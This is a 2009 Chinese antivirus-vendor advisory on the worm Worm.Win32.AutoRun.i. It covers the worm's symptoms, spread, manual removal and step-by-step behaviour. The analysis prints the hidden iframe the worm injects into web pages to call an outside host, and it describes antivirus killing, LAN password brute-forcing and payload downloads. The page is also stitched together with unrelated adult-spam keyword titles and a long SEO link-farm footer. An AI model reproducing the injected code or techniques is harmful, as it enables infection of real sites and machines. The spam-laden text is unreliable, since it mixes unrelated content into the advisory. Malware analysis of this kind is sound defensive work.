一级特黄性生活大片免费观看-一级特黄性色生活片-一级特黄性色生活片一区二区-一级特黄视频-国产最新视频-国产最新精品

   
首 頁  |  微點新聞  |  業界動態  |  安全資訊  |  安全快報  |  產品信息  |  網絡版首頁
通行證  |  客服中心  |  微點社區  |  微點郵局  |  常見問題  |  在線訂購  |  各地代理商
 

"中華吸血鬼"新變種Worm.Win32.AutoRun.i
來源:  2009-10-15 11:33:27

"中華吸血鬼"新變種

Worm.Win32.AutoRun.i

捕獲時間

2009-10-15

危害等級



病毒癥狀

 該樣本是使用“VC”編寫的蠕蟲病毒,由微點主動防御軟件自動捕獲,采用“FSG”加殼方式,企圖躲避特征碼掃描,加殼后長度為“16,897 字節 ”,圖標為“
”,病毒擴展名為“exe”,主要通過“文件捆綁”、“下載器下載”、“移動存儲介質”、“網頁掛馬”等方式傳播,病毒主要目的為下載大量病毒并運行。
  用戶中毒后,會出現大多數殺毒軟件退出和無法正常運行、系統運行緩慢、網絡速度變緩、無法進入安全模式、金山毒霸無法在線升級、打開網頁始終訪問同一個網址、許多反病毒論壇網頁無法打開、出現大量未知進程等現象。

感染對象

Windows 2000/Windows XP/Windows 2003/Vista

傳播途徑

網頁木馬、文件捆綁、下載器下載

防范措施

已安裝使用微點主動防御軟件的用戶,無須任何設置,微點主動防御將自動保護您的系統免受該病毒的入侵和破壞。無論您是否已經升級到最新版本,微點主動防御都能夠有效清除該病毒。如果您沒有將微點主動防御軟件升級到最新版,微點主動防御軟件在發現該病毒后將報警提示您發現“未知木馬”,請直接選擇刪除處理(如圖1);


圖1 微點主動防御軟件自動捕獲未知病毒(未升級)




如果您已經將微點主動防御軟件升級到最新版本,微點將報警提示您發現"Worm.Win32.AutoRun.i”,請直接選擇刪除(如圖2)。


  圖2   微點主動防御軟件升級后截獲已知病毒




未安裝微點主動防御軟件的手動解決辦法:

1、手動恢復以下文件:

全盤刪除所有壓縮包中名為”安裝.bat”的病毒文件。
全盤刪除所有網頁文件中的以下代碼:
<iframe src=http://www.xx.cn/1.htm width=0 height=0></iframe>
全盤刪除所有文件夾下名為wsock32.dll的文件
拷貝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts

2、手動刪除以下文件:
  
%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安裝.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X為系統各個盤符)

3、手動刪除以下注冊表鍵值:

鍵: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
值: {H8I22RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}

4、手動修復以下注冊表鍵值:

修復安全模式:
鍵: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

修復腳本顯示:
鍵:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
值: ActiveDebugging    數據:1
值: DisplayLogo        數據:1
值: SilentTerminate    數據:0
值:UseWINSAFER         數據:1

變量聲明:

 %SystemDriver%       系統所在分區,通常為“C:\”
 %SystemRoot%        WINDODWS所在目錄,通常為“C:\Windows”
 %Documents and Settings%  用戶文檔目錄,通常為“C:\Documents and Settings”
 %Temp%           臨時文件夾,通常為“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
 %ProgramFiles%       系統程序默認安裝目錄,通常為:“C:\ProgramFiles”

病毒分析

(1)創建目錄%SystemRoot%\ini,并設置目錄屬性為隱藏, 釋放文件%SystemRoot%\ini\ini.exe,并執行。
(2)創建互斥體,防止重復運行。
(3)獲得當前進程列表,檢測大多數反病毒軟件進程,一旦找到,終止目標進程,并監視窗口文本,發現相匹配的關鍵字便發送一個
窗口退出消息將目標窗口退出。
(4) 在每個盤符下生成文件AutoRun.inf,并創建目錄 recycle.{645FF040-5081-101B-9F08-00AA002F954E},將
%SystemRoot%\ini\ini.exe復制到recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,并設置為隱藏,使用戶每次雙擊
磁盤和打開資源管理器時自動運行病毒
(5)刪除注冊表相關鍵值,使病毒可以悄無聲息的執行腳本程序。并創建病毒自己的注冊表項,使其成為Windows的活動組件,當用戶
安裝組件時,會自動執行病毒的腳本程序。接著釋放腳本文件%SystemRoot%\ini\shit.vbs,運行該腳本后,將執行病毒程序%SystemRoot%\ini\ini.exe。
(6)全盤查找后綴名為"html、htm、asp、aspx、php、jsp"格式的網頁文件,如果找到,往目標文件中插入類似<iframe  src=http://www.xx.cn/1.htm width=0 height=0></iframe>的惡意代碼,并搜索后綴名為"gho、GHO、Gho"的文件,一旦找到,將其刪除。使用戶丟失系統備份數據。
(7)掃描局域網內其它主機IP地址,并嘗試通過匹配弱口令的方式窮舉出用戶管理員密碼。如果窮舉成功,則將
%SystemRoot%\ini\ini.exe重命名為kav32.exe復制到目標主機的每個共享目錄下,并設置成在某一時間執行該病毒。
(8)病毒通過加載系統核心文件NTDLL.DLL,獲得相關API函數虛擬地址,操作PhysicalMemory內核對象,并提升權限,從而實現對物理內存的直接讀寫操作。
(9)病毒將%SystemRoot%\ini\ini.exe重命名后復制到%SystemRoot%\Tasks\安裝.bat,并全盤查找后綴名為"rar、zip、tgz、tar"的壓縮包文件,一旦找到,利用%ProgramFiles%\WinRAR\Rar.exe程序將目標壓縮包解壓,將病毒程序"安裝.bat"復制到解壓出來的文件夾中,然后再壓縮回去,完成將病毒添加到壓縮包的功能
(10)訪問目標網址,下載資源文件到%TEMP%\configmon.dat文件中,并訪問資源網址,下載大量病毒到本地運行。并統計被感染主機相關信息,發送到指定網址。
(11)釋放動態鏈接庫%SystemRoot%\ini\wsock32.dll,并遍歷所有磁盤文件夾,將文件%SystemRoot%\ini\wsock32.dll復制到每一個找到的文件夾下,并設置該文件屬性為隱藏。
(12)釋放文件%SystemDriver%\__default.pif,訪問網絡下載病毒更新程序,并執行,達到更新病毒自身的目的,
并刪除文件%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT和%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT使金山毒霸無法在線升級,并修改%SystemRoot%\System32\drivers\etc\hosts文件。
(13)刪除注冊表自啟動項下的所有鍵值,并通過刪除注冊表對應鍵值破壞安全模式。
(14) 創建文件%SystemRoot%\ini\desktop.ini,寫入desktop.ini,將其偽裝成回收站,并設置為隱藏,用來隱藏自身。
(15)刪除自身,退出進程。
  
病毒創建文件:

%SystemRoot%\ini
%SystemRoot%\ini\ini.exe
%SystemRoot%\ini\shit.vbs
%SystemRoot%\Tasks\安裝.bat
%TEMP%\configmon.dat
%SystemRoot%\ini\wsock32.dll
%SystemRoot%\ini\desktop.ini
%SystemDriver%\__default.pif
X:\AutoRun.inf
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe  (X為系統各個盤符)

病毒修改文件:

%SystemRoot%\system32\drivers\etc\hosts

病毒刪除文件:

%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\Log.DAT
%Documents and Settings%\All Users\Application Data\Kingsoft\KIS\User.DAT
X:\*.GHO (X為系統各盤符,*.GHO表示所有的GHO文件)

病毒創建注冊表:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I22RB03-AB-B70-7-11d2-     9CBD-0O00FS7AH6-9E2121BHJLK}
   
病毒刪除注冊表:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[所有程序]
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

病毒訪問網絡:

http://****/get.asp
http://****/me.exe
http://pc.sk**ne.cn/gr.txt

免費體驗
下  載
安裝演示

主站蜘蛛池模板: 精品一区二区三区中文字幕| 国产精品一区二区三区久久| 亚洲精品久| 国产精品线在线精品| 欧美日韩国产在线人成dvd| 亚洲综合视频在线观看| 盗摄偷拍a在线观看| 狠狠色丁香久久婷婷综| 免费在线观看毛片| 亚洲99久久久久综合| 成年片免费网址网站| 久草在线视频在线观看| 日本不卡高清免费| 亚洲美女高清aⅴ视频免费| 操操操网| 国产精品久久久久无毒| 久久成人免费| 男人天堂免费| 欧美在线观看一区| 亚洲欧美日韩精品久久| 97在线公开视频| 国产三级黄色| 久久伊人操| 欧美日韩国产亚洲综合不卡| 窝窝人体色| 亚洲香蕉久久一区二区| 91久久夜色精品国产网站| 国产成人精品免费视频大| 国产三级做爰在线观看∵| 久久91在线| 久久伊人成人网| 欧美一级专区免费大片| 亚洲成人在线播放| 一本久| 99国产国人青青视频在线观看| 国产午夜精品理论片在线| 久草中文视频| 免费人成综合在线视频| 欧美精品免费线视频观看视频| 日本在线资源| 日韩精品网址|